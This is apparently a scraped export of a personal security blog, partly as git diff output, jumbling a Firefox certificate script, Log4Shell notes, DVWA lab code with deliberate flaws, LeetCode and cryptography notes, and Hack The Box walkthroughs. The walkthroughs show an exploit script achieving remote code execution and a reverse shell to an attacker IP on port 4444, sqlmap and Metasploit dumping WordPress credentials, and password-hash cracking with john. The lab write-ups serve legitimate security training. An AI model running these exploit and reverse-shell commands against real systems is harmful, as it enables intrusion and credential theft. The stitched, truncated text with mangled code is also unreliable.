::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中通过增加user.js配置文件启用security.enterprise_roots.enabled
::profiles默认配置文件目录 set "parentFolder=%APPDATA%\Mozilla\Firefox\Profiles" ::搜索存在default字符串的文件夹,即profiles配置文件夹 set "searchString=default" set source_user_js=C:\firefoxinstallcert\user.js ::将user.js文件拷贝到配置文件目录
IF EXIST %parentFolder% ( for /d %%F in ("%parentFolder%\*") do ( echo "%%~nxF" | findstr /C:"%searchString%" >nul 2>&1 if errorlevel 1 ( echo default Folder not found. ) else ( echo default Folder found. rem 拼接全路径 set "all_default_path=%parentFolder%\%%~nxF" echo !all_default_path! copy "%source_user_js%" !all_default_path! ) ) ) ELSE ( echo no ) goto :eof pause
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
<pre class="mermaid">graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious class] G --> H[Attacker gains<br>server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;</pre>
graph LR A[Attacker crafts malicious payload with JNDI lookup] --> C{Log4j parses: Contains JNDI lookup?} C -->|Yes| D[Execute JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to attacker's server] F --> G[Download & execute malicious class] G --> H[Attacker gains server control] classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px; classDef highlight fill:#f9d5e5,stroke:#333,stroke-width:2px; classDef decision fill:#e3f2fd,stroke:#333,stroke-width:1px; classDef danger fill:#ffebee,stroke:#333,stroke-width:1px; class A,H highlight; class C decision; class G danger;
sequenceDiagram前端->>前端: 用户首次打开前端页面前端->>后台: version : 0 请求同步数据后台->>前端: 返回数据,同时携带最大的versionnote right of 后台: 返回数据结构:{"version":100, data:[{},{},{}]}
SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injections Blind SQL and Blind OS Command injection Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL) Cross-Site Scripting (XSS) and Cross-Site Tracing (XST) Cross-Site Request Forgery (CSRF) AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL) Malicious, unrestricted file uploads and backdoor files Authentication, authorization and session management issues Arbitrary file access and directory traversals Local and remote file inclusions (LFI/RFI) Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,... HTTP parameter pollution and HTTP response splitting Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues Unvalidated redirects and forwards, and cookie poisoning Cookie poisoning and insecure cryptographic storage Server Side Request Forgery (SSRF) XML External Entity attacks (XXE) And much much much more…
// Checks to see where the request came from if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ];
对referer进行了检查
1 2 3 4 5 6 7 8 9
GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1 Host: 49.232.78.252:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Referer: http://49.232.78.252:81/vulnerabilities/csrf/ Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium Upgrade-Insecure-Requests: 1
// Is it an image? if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 ) ) {
// Can we move the file to the upload folder? if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { // No echo'<pre>Your image was not uploaded.</pre>'; } else { // Yes! echo"<pre>{$target_path} succesfully uploaded!</pre>"; } } else { // Invalid file echo'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'; } }
// Check CAPTCHA from 3rd party $resp = recaptcha_check_answer( $_DVWA[ 'recaptcha_private_key'], $_POST['g-recaptcha-response'] );
// Did the CAPTCHA fail? if( !$resp ) { // What happens when the CAPTCHA was entered incorrectly $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"; $hide_form = false; return; } else { // CAPTCHA was correct. Do both new passwords match? if( $pass_new == $pass_conf ) { // Show next stage for the user echo" <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre> <form action=\"#\" method=\"POST\"> <input type=\"hidden\" name=\"step\" value=\"2\" /> <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" /> <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" /> <input type=\"submit\" name=\"Change\" value=\"Change\" /> </form>"; } else { // Both new passwords do not match. $html .= "<pre>Both passwords must match.</pre>"; $hide_form = false; } } }
// Check to see if both password match if( $pass_new == $pass_conf ) { // They do! $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $pass_new = md5( $pass_new );
// Feedback for the end user echo"<pre>Password Changed.</pre>"; } else { // Issue with the passwords matching echo"<pre>Passwords did not match.</pre>"; $hide_form = false; }
?> <?php if (isset ($_POST['include'])) { $page[ 'body' ] .= " " . $_POST['include'] . " "; } $page[ 'body' ] .= ' <form name="csp" method="POST"> <p>Whatever you enter here gets dropped directly into the page, see if you can get an alert box to pop up.</p> <input size="50" type="text" name="include" value="" id="include" /> <input type="submit" value="Include" /> </form> ';
递归方法 classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: m=len(matrix) if m==0orlen(matrix[0])==0: return [] n=len(matrix[0]) newlist=matrix[0] if m>1:
for i inrange(1,m): newlist.append(matrix[i][n-1])
for j inrange(n-2,-1,-1): newlist.append(matrix[m-1][j]) if n>1: for i inrange(n-2,0,-1): newlist.append(matrix[i][0]) M=[] for k inrange(1,m-1): t=matrix[k][1:-1] M.append(t)
思路清晰方法: classSolution: defspiralOrder(self, matrix: List[List[int]]) -> List[int]: res=[] iflen(matrix)==0: return [] #定义四个边界点 left=0 right=len(matrix[0])-1 top=0 bottom=len(matrix)-1 #在不超过边界的条件下,进行一轮循环 while (top<bottom and left<right): for i inrange(left,right): res.append(matrix[top][i]) for i inrange(top,bottom): res.append(matrix[i][right]) for i inrange(right,left,-1): res.append(matrix[bottom][i]) for i inrange(bottom,top,-1): res.append(matrix[i][left]) left+=1 top+=1 right-=1 bottom-=1 #如果剩余1行或1列:left=0 right1 if top==bottom: for i inrange(left,right+1): res.append(matrix[top][i]) elif left==right: for i inrange(top,bottom+1): res.append(matrix[i][left]) return res
任何多项式可以写为:f(x)=q(x)g(x)+r(x) r(x)称为余式 r(x)=f(x) mod g(x)
若不存在余式,则称g(x)整除f(x),g(x)|f(x)
若f(x)除了它本身和1外,不存在其它因式,则称f(x)是不可约多项式,或既约多项式、素多项式
系数在GF(p)中,以素多项式取模的多项式构成一个域
欧几里得算法
1 2 3 4 5 6 7
a可以表示成a = kb + r(a,b,k,r皆为正整数,且r<b),则r = a mod b 假设d是a,b的一个公约数,记作d|a,d|b,即a和b都可以被d整除。 而r = a - kb,两边同时除以d,r/d=a/d-kb/d=m,由等式右边可知m为整数,因此d|r 因此d也是b,a mod b的公约数 假设d是b,a mod b的公约数, 则d|b,d|(a-k*b),k是一个整数, 进而d|a.因此d也是a,b的公约数 因此(a,b)和(b,a mod b)的公约数是一样的,其最大公约数也必然相等,得证。
1 2 3 4 5
对于任何可以整除a和b的整数,那么它也一定能整除a-b(和b),因此我们选择该整数(前面提到的任何整数)为gcd(a,b),它一定比a-b和b的最大公约数小:gcd(a,b)<=gcd(a-b,b) 同理,任何可以整除a-b和b的整数,一定可以整除a和b,因此我们选择该整数为gcd(a-b,b),它一定比a和b的最大公约数小:gcd(a-b,b)<=gcd(a,b) 由此可知:gcd(a,b)=gcd(a-b,b) 因为总有整数n,使得 a - n*b = a mod b, 所以迭代可知:gcd(a-b,b)=gcd(a-2b,b)=...=gcd(a-n*b,b)=gcd(a mod b,b)
JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
It does not depend on a browser, so you can even run it on Node.js.
Use the form below to convert your own script. Uncheck “eval source” to get back a plain string.
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.
Notice that the solution set must not contain duplicate triplets.
parser.add_argument("--square", help="display a square of a given number", type=int) parser.add_argument("--cubic", help="display a cubic of a given number", type=int)
%% extract watermark FA2=fft2(FAO); G=(FA2-FA)/alpha; GG=G; fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(M(i),N(j),:)=G(i,j,:); end end fori=1:imsize(1)*0.5 forj=1:imsize(2) GG(imsize(1)+1-i,imsize(2)+1-j,:)=GG(i,j,:); end end figure,imshow(GG);title('extracted watermark'); %imwrite(uint8(GG),'extracted watermark.jpg');
The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
注入
失效的身份验证
敏感信息泄露
XML外部实体(XXE)
失效的访问控制
安全配置错误
跨站脚本(XSS)
不安全的反序列化
使用含有已知漏洞的组件
不足的日志记录和监控
Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Broken Authentication. Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.
Sensitive Data Exposure. Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.
XML External Entities (XXE). Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.
Broken Access Control. Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.
Security Misconfiguration. Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.
Cross-Site Scripting (XSS). XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Insecure Deserialization. Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.
Using Components with Known Vulnerabilities. Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.
Insufficient Logging & Monitoring. Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.
]]>
+
+
+
+
+ <blockquote>
+<p>The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consens
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ 浏览器的同源策略与跨站请求伪造(CSRF)
+
+ http://h4m5t.github.io/2021/01/27/%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5/
+ 2021-01-27T16:00:00.000Z
+ 2024-09-24T05:05:42.000Z
+
+ 定义
信息收集123456789101112┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]└─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AESTNmap scan report for bizness.htb (10.129.232.1)Host is up (0.040s latency).Not shown: 65531 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http443/tcp open https41845/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+1echo "10.129.232. ...
xray下载社区版下载和使用
+注意下载新版的,旧版可能无法加载自定义POC
+https://github.com/chaitin/xray/releases
+使用方法查看help
+xray_windows_amd64.exe webscan --help
+1234567891011121314151617181920212223242526272829Version: 1.9.11/eb0c331d/COMMUNITYNAME: xray - A powerful scanner engine [https://docs.xray.cool]USAGE: [global options] command [command options] [arguments...]COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint ...
\ No newline at end of file
diff --git a/page/2/index.html b/page/2/index.html
new file mode 100644
index 000000000..e8625b9ba
--- /dev/null
+++ b/page/2/index.html
@@ -0,0 +1,346 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
HexoWelcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
+Quick StartCreate a new post1$ hexo new "My New Post"
+
+More info: Writing
+Clean1$ hexo clean
+
+Run server1$ hexo server
+
+More info: Server
+Generate static files1$ hexo generate
+
+More info: Generating
+Deploy to remote sites1$ hexo deploy
+
+More info: Deployment
+Actions自动化部署Hexo自动化工作流总是遇到问题,今天终 ...
+bWAPP靶场训练记录,之前就搭好的,一直没练,现在有空练一下
+
+主要内容有:一个很综合的靶场,不错!
+1234567891011121314151617181920SQL, HTML, iFrame, SSI, OS Command, XML, XPath, LDAP and SMTP injectionsBlind SQL and Blind OS Command injectionBash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)Cross-Site Request Forgery (CSRF)AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)Malicious, unrestricted file uploads and backdoor filesAuthentication, authorization and session m ...
\ No newline at end of file
diff --git a/page/3/index.html b/page/3/index.html
new file mode 100644
index 000000000..e6aa8eb29
--- /dev/null
+++ b/page/3/index.html
@@ -0,0 +1,440 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+李卫海PPT学习笔记
+
+其他概念Needham-Schroeder协议:
+利用对称密码技术分发密钥。A,B分别与T有静态密钥。借助信任权威T,分发对称密钥Kab
+多项式GCD算法
+重点:模重复平方算法
+123456c=1for i =k-1 to 0: c=(c^2)mod n if ei==1: c=c*m mod n return
+
+难点:AES列混合矩阵计算,有限域上的多项式模运算。
+对合算法
+对合运算:f =f‘ ,模 2加运算是对合运算。密码算法是对和运算,则加密算法=解密算法,工程实现工作量减半。
+同态加密(英语:Homomorphic encryption)是一种加密形式,它允许人们对密文进行特定形式的代数运算得到仍然是加密的结果,将其解密所得到的结果与对明文进行同样的运算结果一样。换言之,这项技术令人们可以在加密的数据中进行诸如检索、比较等操作,得出正确的结果,而在整个处理过程中无需对数据进行解密。其意义在于,真正从根本上解决将数据及其操作委托给第三方时的保密问题,例如对于各种云计算的应用。
+零知识证明是一种特殊的 ...
ISCC练武题适合新手的题,练练手
+WEB-1
+
+打开环境,是一个投票页面
+
+
+题目要求:在20秒之内让左边的票数高过右边的
+
+方法一:Python写脚本模拟点击,实现刷票
+方法二:修改左右客服的ID
+方法三:直接在控制台修改左边票数的数据
+
+WEB-2查看源码
+
+
+是JS编码
+http://www.jsfuck.com/
+打开在线网站,直接提交这串编码即出flag
+
+JSFuck is an esoteric and educational programming style based on the atomic parts of JavaScript. It uses only six different characters to write and execute code.
+It does not depend on a browser, so you can even run it on Node.js.
+Use the form below to convert your own script. Uncheck “eval source” to get back a p ...
\ No newline at end of file
diff --git a/page/4/index.html b/page/4/index.html
new file mode 100644
index 000000000..85427d79e
--- /dev/null
+++ b/page/4/index.html
@@ -0,0 +1,426 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/5/index.html b/page/5/index.html
new file mode 100644
index 000000000..60a8e2114
--- /dev/null
+++ b/page/5/index.html
@@ -0,0 +1,425 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+3sum跟之前的2sum有点像,但难度更大一些
+
+leetcode.15
+题目描述 :123Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero.Notice that the solution set must not contain duplicate triplets.
+
+范围0 <= nums.length <= 3000
+方法1:枚举所有方法,时间复杂度n^3,会超时
+方法2:排序
+哈希法(2等1)
+循环i,j 此时 t=0-nums[i]-nums[j]
+根据哈希,判断t是否在数组中出现过
+注意:需要去重
+方法3:排序
+双指针(1等2)
+t=0-nums[i]-nums[j]
+思路:
+固定i指针,j,k分别在两端,交替向中间靠拢(比较t)
+注意:去重
+代码12345678910 ...
\ No newline at end of file
diff --git a/page/6/index.html b/page/6/index.html
new file mode 100644
index 000000000..48d581252
--- /dev/null
+++ b/page/6/index.html
@@ -0,0 +1,381 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/7/index.html b/page/7/index.html
new file mode 100644
index 000000000..6051ef35c
--- /dev/null
+++ b/page/7/index.html
@@ -0,0 +1,450 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
+
+注入
+失效的身份验证
+敏感信息泄露
+XML外部实体(XXE)
+失效的访问控制
+安全配置错误
+跨站脚本(XSS)
+不安全的反序列化
+使用含有已知漏洞的组件
+不足的日志记录和监控
+
+
+
+Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into execu ...
\ No newline at end of file
diff --git a/page/8/index.html b/page/8/index.html
new file mode 100644
index 000000000..93a6142af
--- /dev/null
+++ b/page/8/index.html
@@ -0,0 +1,462 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
开启tcpdump
1
sudo tcpdump -i 2 icmp
运行POC
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
查看抓到的数据包:
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
说明RCE成功,现在进行反向shell
首先开启nc监听,再运行exp
1
nc -nlvp 4444
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious codes] G --> H[Attacker gains<br>server control]
Incident Timeline
timeline title Log4j Vulnerability Incident Timeline November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0) December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─# nmap -sV $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema
[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# ftp metapress.htb@$IP Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash 运行john时报错:
1
Crash recovery file is locked: /root/.john/john.rec
解决方法:
1
rm /root/.john/john.rec
开始爆破:
1 2 3 4 5 6 7 8 9 10 11 12 13
